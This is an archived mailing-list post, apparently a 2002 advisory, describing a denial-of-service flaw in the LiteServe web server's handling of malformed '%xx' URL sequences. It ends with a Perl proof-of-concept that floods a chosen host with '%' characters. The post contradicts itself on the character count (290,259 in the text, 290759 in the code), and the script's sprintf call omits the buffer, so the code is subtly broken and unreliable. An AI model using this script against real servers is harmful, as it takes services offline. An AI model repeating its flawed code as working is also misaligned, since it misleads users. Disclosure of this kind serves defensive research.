Christopher Fillion's Perception offers LiteServe, the server suite that has recently been the subject of intensive security research. Another vulnerability has been discovered in LiteServe. The vulnerability this time lies in LiteServe's URL decoder, once again part of the HTTP service. LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such as "%.@", for example, and may produce corrupted output when such a sequence is used. The problem appears to be a referencing issue when the decode sequence does not specify a legitamite hexadecimal sequence. A denial of service may occur if LiteServe is passed an extremely large request consisting only of "%" characters. 290,259 such characters will cause LiteServe to freeze: GET /[buffer] HTTP/1.0 After this request is processed, attempting to connect to the HTTP service reveals that the server is dead. Exploit: #!/usr/bin/perl use IO::Socket; $buffer="%"x290759; $req=sprintf("GET /%s HTTP/1.0\r\n\r\n"); $f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp") ; print $f $req; undef $f;
This archive was generated by hypermail 2b30 : Mon Nov 18 2002 - 00:03:57 PST